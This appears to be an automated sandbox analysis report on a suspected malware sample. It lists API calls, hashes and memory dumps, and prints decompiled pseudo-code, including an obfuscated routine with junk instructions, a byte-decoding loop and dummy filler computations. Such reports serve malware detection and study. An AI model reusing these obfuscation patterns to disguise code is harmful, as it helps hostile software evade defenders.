                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc36ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc36bc
                                                                                                                                                                                                        0x00bc36bc
                                                                                                                                                                                                        0x00bc36c0
                                                                                                                                                                                                        0x00bc36cb
                                                                                                                                                                                                        0x00bc36c2
                                                                                                                                                                                                        0x00bc36c4
                                                                                                                                                                                                        0x00bc36c4
                                                                                                                                                                                                        0x00bc36da
                                                                                                                                                                                                        0x00bc36e0
                                                                                                                                                                                                        0x00bc36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc36ba
                                                                                                                                                                                                        0x00bc36ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BC369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00BC36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 36f1c86bb680f78dc6f2d73448d9b44d990ac5c93cb7f5de3526de3267cebd82
                                                                                                                                                                                                        • Instruction ID: 33a1df89de342452e7388824a27707a005555c8aa600aabe067f3723c014650c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36f1c86bb680f78dc6f2d73448d9b44d990ac5c93cb7f5de3526de3267cebd82
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C01847290421877DB304BA65C4CFEB77FCEB8AF14F44416DB915E2280DA608A40C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00BC6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xbc9a3c; // 0xbc0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00BC44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                        0x00bc651f
                                                                                                                                                                                                        0x00bc652a
                                                                                                                                                                                                        0x00bc6534
                                                                                                                                                                                                        0x00bc656b
                                                                                                                                                                                                        0x00bc6577
                                                                                                                                                                                                        0x00bc657c
                                                                                                                                                                                                        0x00bc6536
                                                                                                                                                                                                        0x00bc653e
                                                                                                                                                                                                        0x00bc6542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6544
                                                                                                                                                                                                        0x00bc6547
                                                                                                                                                                                                        0x00bc654c
                                                                                                                                                                                                        0x00bc6549
                                                                                                                                                                                                        0x00bc6549
                                                                                                                                                                                                        0x00bc6549
                                                                                                                                                                                                        0x00bc655e
                                                                                                                                                                                                        0x00bc6560
                                                                                                                                                                                                        0x00bc6569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6569
                                                                                                                                                                                                        0x00bc6542
                                                                                                                                                                                                        0x00bc6587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 660c2611cf49a81d0a63490b4aca357b358540138836221a3914f670ae1c96c8
                                                                                                                                                                                                        • Instruction ID: 7344ea7e25ae17aefdba0dcc33a41f439b214e22c4946f8deaa14c1afe5166cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 660c2611cf49a81d0a63490b4aca357b358540138836221a3914f670ae1c96c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B801F97250061DBBDB105F699C48EBB7BACEB99765F14016DFE10A3190DB71CD10C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00BC65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                        0x00bc65e8
                                                                                                                                                                                                        0x00bc65ed
                                                                                                                                                                                                        0x00bc65ef
                                                                                                                                                                                                        0x00bc65f2
                                                                                                                                                                                                        0x00bc65f4
                                                                                                                                                                                                        0x00bc65f4
                                                                                                                                                                                                        0x00bc65f6
                                                                                                                                                                                                        0x00bc65f7
                                                                                                                                                                                                        0x00bc6608
                                                                                                                                                                                                        0x00bc6611
                                                                                                                                                                                                        0x00bc6618
                                                                                                                                                                                                        0x00bc661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc660e
                                                                                                                                                                                                        0x00bc6623
                                                                                                                                                                                                        0x00bc6625
                                                                                                                                                                                                        0x00bc663b
                                                                                                                                                                                                        0x00bc663b
                                                                                                                                                                                                        0x00bc663d
                                                                                                                                                                                                        0x00bc6641
                                                                                                                                                                                                        0x00bc6610
                                                                                                                                                                                                        0x00bc6610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6610
                                                                                                                                                                                                        0x00bc6644
                                                                                                                                                                                                        0x00bc6647
                                                                                                                                                                                                        0x00bc6647
                                                                                                                                                                                                        0x00bc6621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00BC2B33), ref: 00BC6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00BC6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00BC6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00BC6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: b2b9b9106d38e4c8afc71d11af7436acb4bcc8454cfa88c4be99b763772b6058
                                                                                                                                                                                                        • Instruction ID: 6a01f228214122614a5cf1ed52d856de66c4620fb0b4d0cfc6e0338730569e22
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2b9b9106d38e4c8afc71d11af7436acb4bcc8454cfa88c4be99b763772b6058
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8F0A4324055506EE7321B299C8CEFBBFDCDF9B259B2D01FFE49593001DA650D468662
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xbc81f8 = E00BC6C70();
				__set_app_type(E00BC6FBE(2));
				 *0xbc88a4 =  *0xbc88a4 | 0xffffffff;
				 *0xbc88a8 =  *0xbc88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xbc8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xbc851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00BC7000();
				if( *0xbc8000 == 0) {
					__setusermatherr(E00BC7000);
				}
				E00BC71EF(_t6);
				return 0;
			}








                                                                                                                                                                                                        0x00bc69b7
                                                                                                                                                                                                        0x00bc69c2
                                                                                                                                                                                                        0x00bc69c8
                                                                                                                                                                                                        0x00bc69cf
                                                                                                                                                                                                        0x00bc69d8
                                                                                                                                                                                                        0x00bc69de
                                                                                                                                                                                                        0x00bc69e4
                                                                                                                                                                                                        0x00bc69e6
                                                                                                                                                                                                        0x00bc69ec
                                                                                                                                                                                                        0x00bc69f2
                                                                                                                                                                                                        0x00bc69f4
                                                                                                                                                                                                        0x00bc6a00
                                                                                                                                                                                                        0x00bc6a07
                                                                                                                                                                                                        0x00bc6a0d
                                                                                                                                                                                                        0x00bc6a0e
                                                                                                                                                                                                        0x00bc6a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00BC6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00BC69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00BC69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00BC69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00BC6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: c114d3506a7e386cb4e314c3c5d838b8ec06f87fec57fbf45cf22e74c1c84121
                                                                                                                                                                                                        • Instruction ID: 9d53b5bba228e9550ed1104c9b28c4fc9c6d4b3fcbd9dad86f0ddbe912dccfaf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c114d3506a7e386cb4e314c3c5d838b8ec06f87fec57fbf45cf22e74c1c84121
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F092705483158FD759AB34ED1AF093BA1FB4C325B10069DE4629B2F1CF7A95458E11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 0041CAF0 Relevance: 35.5, APIs: 4, Strings: 16, Instructions: 461libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                                        			E0041CAF0(void* __eax) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				struct _SECURITY_ATTRIBUTES* _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				struct _SECURITY_ATTRIBUTES* _v56;
				signed int _v57;
				_Unknown_base(*)()* _v64;
				struct _SECURITY_ATTRIBUTES* _v68;
				struct _SECURITY_ATTRIBUTES* _v72;
				struct _SECURITY_ATTRIBUTES* _v76;
				struct _SECURITY_ATTRIBUTES* _v80;
				signed int _v84;
				struct _SECURITY_ATTRIBUTES* _t265;
				struct _SECURITY_ATTRIBUTES* _t275;
				void* _t277;
				void* _t280;
				struct _SECURITY_ATTRIBUTES* _t333;
				void* _t408;
				signed int _t418;
				void* _t461;
				void* _t462;

				asm("rcr edi, 0x5f");
				asm("ror eax, 0xc8");
				asm("bswap esi");
				asm("ror esi, 0x6f");
				asm("rcl edx, 0xc0");
				asm("rol ebx, 0x9f");
				asm("ror edi, 0xbe");
				asm("bswap eax");
				asm("rol ebx, 0x4b");
				asm("ror edx, 0xd0");
				asm("rol edx, 0x6e");
				asm("rol edx, 0x80");
				asm("rcr edx, 0xdf");
				asm("bswap edi");
				asm("rcl edi, 0x6f");
				asm("rcr edi, 0xf3");
				_t418 =  !( ~( !( !(_t408 + 1 - 1 + 0x37) - 0x59) & 0x000000ce));
				_v28 = 0xe0;
				_v27 = 0xe7;
				_v26 = 0xbd;
				_v25 = 0xa4;
				_v24 = 0xdb;
				_v23 = 0x11;
				_v22 = 0x4c;
				_v21 = 2;
				_v20 = 0xe9;
				_v19 = 0x2d;
				_v18 = 0x93;
				_v17 = 0xf9;
				_v16 = 0x67;
				_v56 = 0;
				while(_v56 < 0xd) {
					_v57 =  *((intOrPtr*)(_t461 + _v56 - 0x18));
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) + 0x6b;
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = _v56 + (_v57 & 0x000000ff);
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) - _v56;
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) - _v56;
					_v57 =  ~(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) + 0xb3;
					_v57 = (_v57 & 0x000000ff) >> 0x00000006 | (_v57 & 0x000000ff) << 0x00000002;
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = _v56 + (_v57 & 0x000000ff);
					_v57 =  ~(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) >> 0x00000005 | (_v57 & 0x000000ff) << 0x00000003;
					_v57 =  !(_v57 & 0x000000ff);
					_v57 =  ~(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) - _v56;
					_v57 =  ~(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) >> 0x00000001 | (_v57 & 0x000000ff) << 0x00000007;
					_v57 = _v56 + (_v57 & 0x000000ff);
					_v57 =  !(_v57 & 0x000000ff);
					_v57 =  ~(_v57 & 0x000000ff);
					_v57 =  !(_v57 & 0x000000ff);
					_v57 = (_v57 & 0x000000ff) + 0x85;
					 *((char*)(_t461 + _v56 - 0x18)) = _v57;
					_v56 =  &(_v56->nLength);
				}
				CreateEventW(0, 0, 0, 0);
				_v48 = GetModuleHandleA( &_v28);
				__eflags = _v48;
				if(_v48 != 0) {
					_t335 = _v48;
					_v64 = GetProcAddress(_v48, "FreeConsole");
					__eflags = _v64;
					if(_v64 == 0) {
						_t277 = E0041DD00(_t335, 0x42a460, "Failed to retrieve function address.");
						_t462 = _t462 + 8;
						E0041D1B0(_t277, E0041D0B0);
					} else {
						_v68 = _v64;
						FreeConsole();
						_t280 = E0041DD00(_t335, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Console freed."); // executed
						_t462 = _t462 + 8;
						E0041D1B0(_t280, E0041D0B0);
					}
				}
				E0041D0D0( &_v36, 0x2a);
				_t317 =  &_v36;
				_v52 = E0041D0F0( &_v36);
				_v12 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					while(1) {
						__eflags = _v12 - 0x14;
						if(_v12 >= 0x14) {
							goto L16;
						}
						_v12 = _v12 + 1;
					}
				} else {
					_v72 = 0;
					while(1) {
						__eflags = _v72 - 0xa;
						if(_v72 >= 0xa) {
							break;
						}
						_t317 = _v72 + _v12;
						_v12 = _v72 + _v12;
						_t275 =  &(_v72->nLength);
						__eflags = _t275;
						_v72 = _t275;
					}
				}
				L16:
				E0041D1B0(E0041D1D0(E0041DD00(_t317, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "The value of x is: "), __eflags, _v12), E0041D0B0);
				_v76 = 0;
				while(1) {
					__eflags = _v76 - 5;
					if(_v76 >= 5) {
						break;
					}
					_v12 = _v12 << 1;
					_v12 = _v12 - 3;
					_t333 =  &(_v76->nLength);
					__eflags = _t333;
					_v76 = _t333;
				}
				_t322 = E0041D1D0(E0041DD00(_v12, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Now x is: "), __eflags, _v12);
				E0041D1B0(_t224, E0041D0B0);
				_v84 = _v12;
				__eflags = _v84 - 1;
				if(_v84 == 1) {
					_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 1.");
					E0041D1B0(_t226, E0041D0B0);
				} else {
					__eflags = _v84 - 2;
					if(_v84 == 2) {
						_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 2.");
						E0041D1B0(_t266, E0041D0B0);
					} else {
						__eflags = _v84 - 3;
						if(_v84 == 3) {
							_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 3.");
							E0041D1B0(_t268, E0041D0B0);
						} else {
							_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is neither 1, 2, nor 3.");
							E0041D1B0(_t270, E0041D0B0);
						}
					}
				}
				_v44 = 0;
				_v80 = 1;
				while(1) {
					__eflags = _v80 - 0x64;
					if(_v80 > 0x64) {
						break;
					}
					_t323 = _v44 + _v80;
					_v44 = _v44 + _v80;
					_t265 =  &(_v80->nLength);
					__eflags = _t265;
					_v80 = _t265;
				}
				E0041D1B0(E0041D1D0(E0041DD00(_t323, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "The sum of numbers from 1 to 100 is: "), __eflags, _v44), E0041D0B0);
				_v8 = 0xa;
				_v40 = 0x14;
				_v32 = _v8;
				_v8 = _v40;
				_v40 = _v32;
				E0041D1B0(E0041D1D0(E0041DD00(_t233, E0041D1D0(E0041DD00(_v8, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "After swapping, a is: "), __eflags, _v8), " and b is: "), __eflags, _v40), E0041D0B0);
				asm("rcr edi, 0x5f");
				asm("ror eax, 0xc8");
				asm("bswap esi");
				asm("ror esi, 0x6f");
				asm("rcl edx, 0xc0");
				asm("rol ebx, 0x9f");
				asm("ror edi, 0xbe");
				asm("bswap eax");
				asm("rol ebx, 0x4b");
				asm("ror edx, 0xd0");
				asm("rol edx, 0x6e");
				asm("rol edx, 0x80");
				asm("rcr edx, 0xdf");
				asm("bswap edi");
				asm("rcl edi, 0x6f");
				asm("rcr edi, 0xf3");
				E00419140(( !((0 * (_t418 + 1 - 1 + 0x37) + 0x3d) * (0 * (_t418 + 1 - 1 + 0x37) + 0x3d)) * (((0 * (_t418 + 0x00000001 - 0x00000001 + 0x37) + 0x3d) * (0 * (_t418 + 0x00000001 - 0x00000001 + 0x37) + 0x3d) >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc); // executed
				asm("rcr edi, 0x5f");
				asm("ror eax, 0xc8");
				asm("bswap esi");
				asm("ror esi, 0x6f");
				asm("rcl edx, 0xc0");
				asm("rol ebx, 0x9f");
				asm("ror edi, 0xbe");
				asm("bswap eax");
				asm("rol ebx, 0x4b");
				asm("ror edx, 0xd0");
				asm("rol edx, 0x6e");
				asm("rol edx, 0x80");
				asm("rcr edx, 0xdf");
				asm("bswap edi");
				asm("rcl edi, 0x6f");
				asm("rcr edi, 0xf3");
				__eflags = 0;
				return 0;
			}









































                                                                                                                                                                                                        0x0041cafb
                                                                                                                                                                                                        0x0041cb00
                                                                                                                                                                                                        0x0041cb08
                                                                                                                                                                                                        0x0041cb14
                                                                                                                                                                                                        0x0041cb20
                                                                                                                                                                                                        0x0041cb24
                                                                                                                                                                                                        0x0041cb30
                                                                                                                                                                                                        0x0041cb33
                                                                                                                                                                                                        0x0041cb3c
                                                                                                                                                                                                        0x0041cb4a
                                                                                                                                                                                                        0x0041cb4d
                                                                                                                                                                                                        0x0041cb50
                                                                                                                                                                                                        0x0041cb5e
                                                                                                                                                                                                        0x0041cb61
                                                                                                                                                                                                        0x0041cb63
                                                                                                                                                                                                        0x0041cb6f
                                                                                                                                                                                                        0x0041cb75
                                                                                                                                                                                                        0x0041cb7c
                                                                                                                                                                                                        0x0041cb80
                                                                                                                                                                                                        0x0041cb84
                                                                                                                                                                                                        0x0041cb88
                                                                                                                                                                                                        0x0041cb8c
                                                                                                                                                                                                        0x0041cb90
                                                                                                                                                                                                        0x0041cb94
                                                                                                                                                                                                        0x0041cb98
                                                                                                                                                                                                        0x0041cb9c
                                                                                                                                                                                                        0x0041cba0
                                                                                                                                                                                                        0x0041cba4
                                                                                                                                                                                                        0x0041cba8
                                                                                                                                                                                                        0x0041cbac
                                                                                                                                                                                                        0x0041cbb0
                                                                                                                                                                                                        0x0041cbc2
                                                                                                                                                                                                        0x0041cbd3
                                                                                                                                                                                                        0x0041cbdc
                                                                                                                                                                                                        0x0041cbe6
                                                                                                                                                                                                        0x0041cbef
                                                                                                                                                                                                        0x0041cbf9
                                                                                                                                                                                                        0x0041cc02
                                                                                                                                                                                                        0x0041cc0c
                                                                                                                                                                                                        0x0041cc15
                                                                                                                                                                                                        0x0041cc1f
                                                                                                                                                                                                        0x0041cc28
                                                                                                                                                                                                        0x0041cc34
                                                                                                                                                                                                        0x0041cc47
                                                                                                                                                                                                        0x0041cc50
                                                                                                                                                                                                        0x0041cc5a
                                                                                                                                                                                                        0x0041cc63
                                                                                                                                                                                                        0x0041cc76
                                                                                                                                                                                                        0x0041cc7f
                                                                                                                                                                                                        0x0041cc88
                                                                                                                                                                                                        0x0041cc92
                                                                                                                                                                                                        0x0041cc9b
                                                                                                                                                                                                        0x0041ccad
                                                                                                                                                                                                        0x0041ccb7
                                                                                                                                                                                                        0x0041ccc0
                                                                                                                                                                                                        0x0041ccc9
                                                                                                                                                                                                        0x0041ccd2
                                                                                                                                                                                                        0x0041ccde
                                                                                                                                                                                                        0x0041cce7
                                                                                                                                                                                                        0x0041cbbf
                                                                                                                                                                                                        0x0041cbbf
                                                                                                                                                                                                        0x0041ccf8
                                                                                                                                                                                                        0x0041cd08
                                                                                                                                                                                                        0x0041cd0b
                                                                                                                                                                                                        0x0041cd0f
                                                                                                                                                                                                        0x0041cd16
                                                                                                                                                                                                        0x0041cd20
                                                                                                                                                                                                        0x0041cd23
                                                                                                                                                                                                        0x0041cd27
                                                                                                                                                                                                        0x0041cd61
                                                                                                                                                                                                        0x0041cd66
                                                                                                                                                                                                        0x0041cd6b
                                                                                                                                                                                                        0x0041cd29
                                                                                                                                                                                                        0x0041cd2c
                                                                                                                                                                                                        0x0041cd2f
                                                                                                                                                                                                        0x0041cd41
